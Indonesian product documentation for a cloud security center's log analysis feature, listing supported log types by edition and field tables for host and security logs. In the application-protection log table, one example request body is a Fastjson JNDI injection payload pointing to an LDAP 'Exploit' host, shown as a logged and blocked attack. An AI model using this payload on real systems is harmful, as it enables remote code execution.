Fitur analisis log Pusat Keamanan menyediakan penyimpanan terpusat, kueri, dan analisis aktivitas host serta event keamanan untuk mendukung audit keamanan, pelacakan event, dan deteksi ancaman. Topik ini menjelaskan jenis log yang didukung oleh Pusat Keamanan, perbedaan antar edisi, field log, serta contoh kueri.
Log yang didukung
Langganan
Log host
Kategorisasi log | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Logon logs | |||||
Network connection logs | |||||
Process startup logs | |||||
Brute-force attack logs | |||||
DNS query logs | |||||
Client event logs | |||||
Account snapshot logs | |||||
Network snapshot logs | |||||
Process snapshot logs |
Log keamanan
Kategorisasi log | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Security alert logs | Catatan Hanya alert yang didukung oleh Edisi Gratis yang dicatat. | ||||
Vulnerability logs | Catatan Hanya kerentanan yang didukung oleh Edisi Gratis yang dicatat. | ||||
Network defense logs | |||||
Core file monitoring event logs | |||||
CSPM - Baseline checks |
Log layanan bernilai tambah
Jika Anda mengaktifkan layanan bernilai tambah berikut, Pusat Keamanan dapat menganalisis log yang dihasilkannya.
Malicious File Detection
Agentless Detection
Application Protection
CSPM (Baseline Check logs and CSPM logs)
Pay-as-you-go
Jika Anda membeli layanan pay-as-you-go Host and Container Security, jenis log yang didukung bervariasi tergantung pada tingkat perlindungan yang ditautkan ke server.
Log host
Kategorisasi log | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Logon logs | ||||
Network connection logs | ||||
Process startup logs | ||||
Brute-force attack logs | ||||
DNS query logs | ||||
Client event logs | ||||
Account snapshot logs | ||||
Network snapshot logs | ||||
Process snapshot logs |
Log keamanan
Kategorisasi log | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Security alert logs | Catatan Hanya alert yang didukung untuk level Unprotected yang dicatat. | |||
Vulnerability logs | Catatan Hanya kerentanan pada level Unprotected yang dicatat. | |||
Network defense logs | ||||
Core file monitoring event logs |
Log layanan pay-as-you-go
Jika Anda mengaktifkan layanan pay-as-you-go berikut, Pusat Keamanan dapat menganalisis log yang dihasilkannya.
Malicious File Detection
Agentless Detection
Application Protection
CSPM (Baseline Check and CSPM logs)
Deskripsi jenis log
Contoh log dan deskripsi field berikut hanya untuk referensi. Field spesifik dapat berubah seiring pembaruan produk. Untuk informasi paling akurat, rujuk data yang dikumpulkan di Simple Log Service.
Log host
__topic__:
aegis-log-loginIsi log: Mencatat event login pengguna di server, termasuk alamat IP sumber, username, dan hasil login.
Deskripsi: Membantu Anda memantau aktivitas pengguna dan segera mengidentifikasi serta merespons perilaku abnormal.
PentingPusat Keamanan tidak mendukung pengumpulan logon logs untuk sistem operasi Windows Server 2008.
Periode pengumpulan: Real-time.
__topic__:
aegis-log-networkIsi log: Mencatat aktivitas koneksi jaringan di server secara real-time, termasuk informasi seperti 5-tuple koneksi dan proses terkait.
Deskripsi: Membantu Anda menemukan perilaku koneksi abnormal, mengidentifikasi potensi serangan jaringan, dan mengoptimalkan kinerja jaringan.
PentingServer hanya mengumpulkan beberapa status koneksi dari pembentukan hingga terminasi.
Lalu lintas masuk tidak dicatat.
Periode pengumpulan: Real-time.
__topic__:
aegis-log-processIsi log: Mencatat event startup semua proses baru di server, termasuk informasi seperti nama proses, parameter command-line, dan proses induk.
Deskripsi: Membantu Anda memahami status startup dan konfigurasi proses dalam sistem serta mendeteksi masalah seperti aktivitas proses abnormal, intrusi malware, dan ancaman keamanan.
Periode pengumpulan: Real-time. Log dilaporkan segera setelah proses dimulai.
__topic__:
aegis-log-crackIsi log: Mencatat perilaku serangan brute-force, termasuk informasi tentang upaya login dan cracking terhadap sistem, aplikasi, atau akun.
Deskripsi: Membantu Anda mengidentifikasi serangan brute-force, mendeteksi login abnormal, kata sandi lemah, dan kebocoran kredensial. Log ini juga mendukung respons insiden dan analisis forensik.
Periode pengumpulan: Real-time.
__topic__:
aegis-snapshot-hostIsi log: Mencatat informasi detail tentang akun pengguna dalam sistem atau aplikasi, termasuk properti dasar akun seperti username, kebijakan kata sandi, dan riwayat login.
Deskripsi: Dengan membandingkan snapshot dari waktu yang berbeda, Anda dapat memantau perubahan akun dan segera mendeteksi masalah keamanan seperti akses tidak sah dan status akun abnormal.
Periode pengumpulan: Data dikumpulkan secara otomatis sesuai interval yang ditetapkan di Asset Fingerprints. Jika tidak ada interval yang ditetapkan, data dikumpulkan sekali sehari. Anda juga dapat mengumpulkan data secara manual.
__topic__:
aegis-snapshot-portIsi log: Mencatat informasi koneksi jaringan, termasuk 5-tuple koneksi, status koneksi, dan proses terkait.
Deskripsi: Membantu Anda memahami koneksi jaringan aktif dalam sistem, menemukan perilaku koneksi abnormal, dan mengidentifikasi potensi serangan jaringan.
Periode pengumpulan: Data dikumpulkan secara otomatis sesuai interval yang ditetapkan di Asset Fingerprints. Jika tidak ada interval yang ditetapkan, data dikumpulkan sekali sehari. Anda juga dapat mengumpulkan data secara manual.
__topic__:
aegis-snapshot-processIsi log: Mencatat aktivitas proses dalam sistem, termasuk ID proses, nama, dan waktu mulai.
Deskripsi: Gunakan log ini untuk memahami aktivitas proses dan penggunaan sumber daya, serta mendeteksi masalah seperti proses abnormal, penggunaan CPU tinggi, dan kebocoran memori.
Periode pengumpulan: Data dikumpulkan secara otomatis sesuai interval yang ditetapkan di Asset Fingerprints. Jika tidak ada interval yang ditetapkan, data dikumpulkan sekali sehari. Anda juga dapat mengumpulkan data secara manual.
__topic__:
aegis-log-dns-queryIsi log: Mencatat permintaan kueri DNS yang diprakarsai oleh server, termasuk informasi seperti nama domain yang dikueri, tipe kueri, dan sumber.
PentingPengumpulan log tidak didukung untuk server Linux dengan versi kernel sebelum 4.X.X.
Deskripsi: Gunakan log ini untuk menganalisis aktivitas DNS dan mendeteksi masalah seperti kueri abnormal, pembajakan domain, dan polusi DNS.
Periode pengumpulan: Real-time.
__topic__:
aegis-log-clientIsi log: Mencatat event online dan offline agen Pusat Keamanan.
Deskripsi: Membantu Anda memantau status berjalan agen Pusat Keamanan.
Periode pengumpulan: Real-time.
Log keamanan
Semua log keamanan dikumpulkan secara real-time.
__topic__:
sas-vul-logIsi log: Mencatat informasi tentang kerentanan yang ditemukan di sistem atau aplikasi Anda, termasuk nama kerentanan, status, dan tindakan penanganan.
Deskripsi: Membantu Anda memahami kerentanan, risiko keamanan, dan tren serangan dalam sistem sehingga Anda dapat mengambil langkah remediasi tepat waktu.
__topic__:
sas-hc-logIsi log: Mencatat hasil pemeriksaan risiko baseline, termasuk informasi seperti tingkat baseline, kategori, dan tingkat risiko.
PentingHanya data item pemeriksaan yang gagal pertama kali yang dicatat. Data untuk item pemeriksaan yang sebelumnya lulus tetapi gagal dalam pemeriksaan baru juga dicatat.
Deskripsi: Membantu Anda memahami status keamanan baseline dan potensi risiko dalam sistem Anda.
__topic__:
sas-security-logIsi log: Mencatat event keamanan dan alert yang terjadi dalam sistem atau aplikasi Anda, termasuk sumber data alert, detail, dan tingkat alert.
Deskripsi: Membantu Anda memahami event keamanan dan ancaman dalam sistem sehingga Anda dapat mengambil langkah respons yang sesuai.
CSPM - Cloud platform configuration check logs
__topic__:
sas-cspm-logIsi log: Mencatat informasi seperti hasil pemeriksaan konfigurasi platform cloud dan operasi daftar putih.
Deskripsi: Membantu Anda memahami masalah konfigurasi dan potensi risiko keamanan dalam platform cloud Anda.
__topic__:
sas-net-blockIsi log: Mencatat event serangan jaringan, termasuk informasi penting seperti tipe serangan dan alamat IP sumber/tujuan.
Deskripsi: Membantu Anda memahami event keamanan pada jaringan Anda sehingga Anda dapat mengambil langkah respons dan pertahanan untuk meningkatkan keamanan jaringan.
__topic__:
sas-rasp-logIsi log: Mencatat informasi alert serangan dari Runtime Application Self-Protection (RASP), termasuk tipe serangan, data perilaku, dan alamat IP penyerang.
Deskripsi: Membantu Anda memahami event keamanan dalam aplikasi Anda sehingga Anda dapat mengambil langkah respons dan pertahanan untuk meningkatkan keamanan aplikasi.
__topic__:
sas-filedetect-logIsi log: Mencatat hasil deteksi dari kit pengembangan perangkat lunak (SDK) deteksi malware, termasuk informasi file, skenario deteksi, dan hasil.
Deskripsi: Membantu Anda mengidentifikasi dan segera menangani program berbahaya dalam file offline atau penyimpanan cloud.
Core file monitoring event logs
__topic__:
aegis-file-protect-logIsi log: Mencatat event alert yang dideteksi oleh fitur pemantauan file inti, termasuk path file, tipe operasi, dan tingkat alert.
Deskripsi: Membantu Anda memantau apakah file inti dicuri atau dirusak.
__topic__:
sas-agentless-logIsi log: Mencatat risiko keamanan yang terdeteksi di server cloud, snapshot disk, dan citra. Risiko ini mencakup kerentanan, baseline, sampel berbahaya, dan file sensitif.
Deskripsi: Membantu Anda melihat status risiko keamanan aset Anda selama periode waktu berbeda untuk mengidentifikasi dan merespons potensi ancaman.
Field log host
Log masuk
Field | Deskripsi | Contoh |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
sas_group_name | Grup aset server di Security Center. | default |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | Alamat IP sumber untuk logon. | 221.11.XX.XX |
dst_port | Port logon server. | 22 |
login_type | Jenis masuk. Nilai yang valid meliputi tetapi tidak terbatas pada:
| SSH |
username | Nama pengguna logon. | admin |
login_count | Jumlah logon. Login berulang dalam satu menit digabung menjadi satu entri log. Misalnya, jika nilai | 3 |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log koneksi jaringan
Field | Deskripsi | Contoh |
cmd_chain | Rantai proses. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | Indeks rantai proses. Gunakan indeks untuk mencari rantai proses. | B184 |
container_hostname | Nama server di kontainer. | nginx-ingress-controller-765f67fd4d-**** |
container_id | ID kontainer. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | ID citra. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | Nama citra. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | Nama kontainer. | nginx-ingress-**** |
container_pid | ID proses di kontainer. | 0 |
net_connect_dir | Arah koneksi jaringan. Nilai yang valid:
| in |
dst_ip | Alamat IP penerima koneksi jaringan.
| 192.168.XX.XX |
dst_port | Port penerima koneksi jaringan. | 443 |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
parent_proc_name | Nama file proses induk. | /usr/bin/bash |
pid | ID proses. | 14275 |
ppid | ID proses induk. | 14268 |
proc_name | Nama proses. | nginx |
proc_path | Path proses. | /usr/local/nginx/sbin/nginx |
proc_start_time | Waktu startup proses. | N/A |
connection_type | Protokol. Nilai yang valid:
| tcp |
sas_group_name | Grup aset server di Security Center. | default |
src_ip | Alamat IP sumber. | 100.127.XX.XX |
src_port | Port sumber. | 41897 |
srv_comm | Nama perintah yang terkait dengan proses kakek. | containerd-shim |
status | Status koneksi jaringan. Nilai yang valid:
| 5 |
type | Jenis koneksi jaringan real-time. Nilai yang valid:
| listen |
uid | ID pengguna proses. | 101 |
username | Nama pengguna proses. | root |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log startup proses
Field | Deskripsi | Contoh |
cmd_chain | Rantai proses. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | Indeks rantai proses. Gunakan indeks untuk mencari rantai proses. | B184 |
cmd_index | Indeks setiap parameter dalam baris perintah. Setiap pasangan indeks menunjukkan awal dan akhir parameter. | 0,3,5,8 |
cmdline | Baris perintah lengkap untuk memulai proses. | ipset list KUBE-6-CLUSTER-IP |
comm | Nama perintah yang terkait dengan proses. | N/A |
container_hostname | Nama server di kontainer. | nginx-ingress-controller-765f67fd4d-**** |
container_id | ID kontainer. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | ID citra. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | Nama citra. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | Nama kontainer. | nginx-ingress-**** |
container_pid | ID proses di kontainer. | 0 |
cwd | Direktori tempat proses berjalan. | N/A |
proc_name | Nama file proses. | ipset |
proc_path | Path lengkap file proses. | /usr/sbin/ipset |
gid | ID grup proses. | 0 |
groupname | Grup pengguna. | group1 |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
parent_cmd_line | Baris perintah proses induk. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | Nama file proses induk. | kube-proxy |
parent_proc_path | Path lengkap file proses induk. | /usr/local/bin/kube-proxy |
pid | ID proses. | 14275 |
ppid | ID proses induk. | 14268 |
proc_start_time | Waktu startup proses. | 2024-08-01 16:45:40 |
parent_proc_start_time | Waktu startup proses induk. | 2024-07-12 19:45:19 |
sas_group_name | Grup aset server di Security Center. | default |
srv_cmd | Baris perintah proses kakek. | /usr/bin/containerd |
tty | Terminal logon. N/A menunjukkan bahwa akun belum pernah logon ke terminal. | N/A |
uid | ID pengguna. | 123 |
username | Nama pengguna proses. | root |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log serangan brute-force
Field | Deskripsi | Contoh |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server yang menjadi sasaran serangan brute-force. | 192.168.XX.XX |
sas_group_name | Grup aset server di Security Center. | default |
uuid | UUID server yang menjadi sasaran serangan brute-force. | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | Jumlah logon gagal. Login berulang dalam satu menit digabung menjadi satu entri log. Misalnya, jika nilai | 3 |
src_ip | Alamat IP sumber untuk logon. | 47.92.XX.XX |
dst_port | Port logon. | 22 |
login_type | Jenis masuk. Nilai yang valid:
| SSH |
username | Nama pengguna logon. | user |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log Snapshot akun
Field | Deskripsi | Contoh |
account_expire | Waktu kedaluwarsa akun. never menunjukkan bahwa akun tidak pernah kedaluwarsa. | never |
domain | Domain atau layanan direktori tempat akun tersebut berada. N/A menunjukkan bahwa akun tidak termasuk dalam domain apa pun. | N/A |
groups | Grup tempat akun tersebut berada. N/A menunjukkan bahwa akun tidak termasuk dalam grup apa pun. | ["nscd"] |
home_dir | Direktori home. Ini adalah lokasi default untuk menyimpan dan mengelola file dalam sistem. | /Users/abc |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
last_chg | Tanggal terakhir kata sandi diubah. | 2022-11-29 |
last_logon | Tanggal dan waktu logon terakhir ke akun. N/A menunjukkan bahwa akun belum pernah dilogon. | 2023-08-18 09:21:21 |
login_ip | Alamat IP jarak jauh dari masuk terakhir ke akun. N/A menunjukkan bahwa akun belum pernah dimasuki. | 192.168.XX.XX |
passwd_expire | Tanggal kedaluwarsa kata sandi. never menunjukkan bahwa kata sandi tidak pernah kedaluwarsa. | 2024-08-24 |
perm | Menunjukkan apakah akun memiliki izin root. Nilai yang valid:
| 0 |
sas_group_name | Grup aset server di Security Center. | default |
shell | Perintah shell Linux. | /sbin/nologin |
status | Status akun pengguna. Nilai yang valid:
| 0 |
tty | Terminal logon. N/A menunjukkan bahwa akun belum pernah logon ke terminal. | N/A |
username | Nama pengguna. | nscd |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | Tanggal pengingat kedaluwarsa kata sandi. never menunjukkan bahwa pengingat tidak pernah dikirim. | 2024-08-20 |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log snapshot jaringan
Field | Deskripsi | Contoh |
net_connect_dir | Arah koneksi jaringan. Nilai yang valid:
| in |
dst_ip | Alamat IP penerima koneksi jaringan.
| 192.168.XX.XX |
dst_port | Port penerima koneksi jaringan. | 443 |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
pid | ID proses. | 682 |
proc_name | Nama proses. | sshd |
connection_type | Protokol. Nilai yang valid:
| tcp4 |
sas_group_name | Grup aset server di Security Center. | default |
src_ip | Alamat IP sumber. | 100.127.XX.XX |
src_port | Port sumber. | 41897 |
status | Status koneksi jaringan. Nilai yang valid:
| 5 |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log snapshot proses
Field | Deskripsi | Contoh |
cmdline | Baris perintah lengkap untuk memulai proses. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
md5 | Hash MD5 file biner. Catatan Hash MD5 tidak dihitung untuk file proses yang lebih besar dari 1 MB. | 1086e731640751c9802c19a7f53a64f5 |
proc_name | Nama file proses. | assist_daemon |
proc_path | Path lengkap file proses. | /usr/local/share/assist-daemon/assist_daemon |
pid | ID proses. | 1692 |
pname | Nama file proses induk. | systemd |
sas_group_name | Grup aset server di Security Center. | default |
proc_start_time | Waktu startup proses. Ini adalah field bawaan. | 2023-08-18 20:00:12 |
uid | ID pengguna proses. | 101 |
username | Nama pengguna proses. | root |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
DNS request logs
Field | Deskripsi | Contoh |
domain | Nama domain yang sesuai dengan permintaan DNS. | example.aliyundoc.com |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server yang memprakarsai permintaan DNS. | 192.168.XX.XX |
pid | ID proses yang memprakarsai permintaan DNS. | 3544 |
ppid | ID proses induk yang memprakarsai permintaan DNS. | 3408 |
cmd_chain | Rantai proses yang memprakarsai permintaan DNS. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | Command line yang memprakarsai permintaan DNS. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | Path proses yang memprakarsai permintaan DNS. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | Grup aset server di Security Center. | default |
time | Waktu saat event permintaan DNS ditangkap. Waktu ini umumnya sama dengan waktu terjadinya permintaan DNS. | 2023-08-17 20:05:04 |
uuid | UUID server yang memprakarsai permintaan DNS. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log event klien
Field | Deskripsi | Contoh |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
agent_version | Versi Agen. | aegis_11_91 |
last_login | Timestamp masuk terakhir. Satuan: milidetik. | 1716444387617 |
platform | Jenis sistem operasi. Nilai yang valid:
| linux |
region_id | ID wilayah tempat server berada. | cn-beijing |
status | Status klien. Nilai yang valid:
| online |
start_time | Timestamp mulai dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Field log keamanan
Log kerentanan
Field | Deskripsi | Contoh |
vul_alias_name | Alias kerentanan. | CESA-2023:1335: Pembaruan Keamanan openssl |
risk_level | Tingkat risiko. Nilai yang valid:
| later |
extend_content | Informasi tambahan tentang kerentanan. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset. | 192.168.XX.XX |
instance_name | Hostname. | hhht-linux-*** |
vul_name | Nama kerentanan. | centos:7:cesa-2023:1335 |
operation | Tindakan yang dilakukan pada kerentanan. Nilai valid:
| new |
status | Status. Nilai valid:
| 1 |
tag | Tag kerentanan. Nilai yang valid:
| oval |
type | Jenis kerentanan. Nilai yang valid:
| sys |
uuid | UUID server. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
CSPM - Baseline check logs
Field | Deskripsi | Contoh |
check_item_name | Nama item pemeriksaan. | Atur interval minimum untuk perubahan kata sandi |
check_item_level | Level pemeriksaan baseline. Nilai valid:
| medium |
check_type | Jenis item pemeriksaan. | Otentikasi identitas |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
risk_level | Level item risiko. Nilai valid:
| medium |
operation | Operasi. Nilai valid:
| new |
risk_name | Nama item risiko. | Pemeriksaan kepatuhan kebijakan kata sandi |
sas_group_name | Grup aset server tempat item risiko terdeteksi di Security Center. | default |
status | Status. Nilai valid:
| 1 |
sub_type_alias_name | Alias subtipe. | Praktik keamanan terbaik internasional - Pemeriksaan baseline keamanan Ubuntu 16/18/20/22 |
sub_type_name | Nama subtipe baseline. Untuk informasi lebih lanjut tentang nilai valid subtipe baseline, lihat Daftar tipe dan subtipe baseline. | hc_ubuntu16_cis_rules |
type_alias_name | Alias tipe. | Praktik keamanan terbaik internasional |
type_name | Tipe baseline. Untuk informasi lebih lanjut tentang nilai valid tipe baseline, lihat Daftar tipe dan subtipe baseline. | cis |
uuid | UUID server tempat item risiko terdeteksi. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log peringatan keamanan
Field | Deskripsi | Contoh |
data_source | Sumber data. Nilai yang valid:
| aegis_login_log |
detail | Objek JSON yang memberikan konteks detail untuk peringatan. Field dalam objek ini bervariasi berdasarkan tipe peringatan. Berikut menjelaskan field umum objek
| {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Unusual Account Logon to ECS","status":0} |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset. | 192.168.XX.XX |
level | Tingkat risiko peristiwa peringatan. Nilai yang valid:
| suspicious |
name | Nama peringatan. | Logon Anomali - Logon Akun Tidak Biasa ke ECS |
operation | Operasi. Nilai valid:
| new |
status | Status peringatan. Nilai yang valid:
| 1 |
unique_info | Pengidentifikasi unik peringatan. | 2536dd765f804916a1fa3b9516b5**** |
uuid | UUID server yang menghasilkan peringatan. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
suspicious_event_id | ID event alert. | 650226318 |
handle_time | Waktu yang sesuai dengan operasi. | 1765272845 |
alert_first_time | Waktu pertama kali alert terjadi. | 1764226915 |
alert_last_time | Waktu terakhir alert terjadi. | 1765273425 |
strict_type | Menunjukkan apakah alert merupakan alert mode ketat. Nilai valid: true, false. | |
user_id | ID akun. | 1358******3357 |
CSPM - Cloud platform configuration check logs
Field | Deskripsi | Contoh |
check_id | ID item pemeriksaan. Anda dapat memanggil operasi ListCheckResult untuk mendapatkan ID. | 11 |
check_item_name | Nama item pemeriksaan. | Konfigurasi pengambilan origin |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
instance_name | Nama instans. | lsm |
instance_result | Dampak risiko. Nilainya berupa string JSON. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"ID Instans","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Nama Instans","type":"text"}]} |
instance_sub_type | Subtipe instans. Nilai yang valid:
| INSTANCE |
instance_type | Tipe instans. Nilai yang valid:
| ECS |
region_id | ID wilayah tempat instans berada. | cn-hangzhou |
requirement_id | ID persyaratan. Anda dapat memanggil operasi ListCheckStandard untuk mendapatkan ID. | 5 |
risk_level | Tingkat risiko. Nilai yang valid:
| MEDIUM |
section_id | ID bagian. Anda dapat memanggil operasi ListCheckResult untuk mendapatkan ID. | 1 |
standard_id | ID standar. Anda dapat memanggil operasi ListCheckStandard untuk mendapatkan ID. | 1 |
status | Status item pemeriksaan. Nilai yang valid:
| PASS |
vendor | Penyedia layanan cloud. Nilainya tetap ALIYUN. | ALIYUN |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log pertahanan jaringan
Field | Deskripsi | Contoh |
cmd | Baris perintah proses yang diserang. | nginx: master process nginx |
cur_time | Waktu peristiwa serangan terjadi. | 2023-09-14 09:21:59 |
decode_payload | Payload yang dikonversi dari format HEX ke karakter. | POST /Services/FileService/UserFiles/ |
dst_ip | Alamat IP aset yang diserang. | 172.16.XX.XX |
dst_port | Port aset yang diserang. | 80 |
func | Tipe event yang dicegat. Nilai valid:
| payload |
rule_type | Tipe aturan spesifik event yang dicegat. Nilai valid:
| alinet_payload |
instance_id | ID instans aset yang diserang. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset yang diserang. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset yang diserang. | 192.168.XX.XX |
final_action | Mode tindakan pertahanan. Nilainya adalah block (dicegat). | block |
payload | Payload dalam format HEX. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | ID proses yang diserang. | 7107 |
platform | Tipe sistem aset yang diserang. Nilai valid:
| linux |
proc_path | Path proses yang diserang. | /usr/sbin/nginx |
sas_group_name | Grup aset server di Security Center. | default |
src_ip | Alamat IP sumber yang memulai serangan. | 106.11.XX.XX |
src_port | Port sumber yang memulai serangan. | 29575 |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log perlindungan aplikasi
Field | Deskripsi | Contoh |
app_dir | Direktori tempat aplikasi berada. | /usr/local/aegis/rasp/apps/1111 |
app_id | ID aplikasi. | 6492a391fc9b4e2aad94**** |
app_name | Nama aplikasi. | test |
confidence_level | Tingkat kepercayaan algoritma deteksi. Nilai yang valid:
| low |
request_body | Badan permintaan. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | Panjang badan permintaan. | 112 |
data | Parameter hook point. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | Header permintaan. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | Nama host atau perangkat jaringan. | testhostname |
host_ip | Alamat IP pribadi host. | 172.16.XX.XX |
is_cliped | Menunjukkan apakah log dipotong karena terlalu panjang. Nilai valid:
| false |
jdk_version | Versi JDK. | 1.8.0_292 |
message | Deskripsi peringatan. | Serial kelas tidak aman. |
request_method | Metode permintaan. | Post |
platform | Jenis sistem operasi. | Linux |
arch | Arsitektur sistem operasi. | amd64 |
kernel_version | Versi kernel sistem operasi. | 3.10.0-1160.59.1.el7.x86_64 |
param | Parameter permintaan. Format umum meliputi:
| {"url":["http://127.0.0.1.xip.io"]} |
payload | Payload serangan. | bash -c kill -0 -- -'31098' |
payload_length | Panjang payload serangan. | 27 |
rasp_id | ID unik probe perlindungan aplikasi. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | Versi probe perlindungan aplikasi. | 0.8.5 |
src_ip | Alamat IP peminta. | 172.0.XX.XX |
final_action | Hasil penanganan peringatan. Nilai yang valid:
| block |
rule_action | Metode penanganan peringatan yang ditentukan oleh aturan. Nilai yang valid:
| block |
risk_level | Tingkat risiko. Nilai yang valid:
| high |
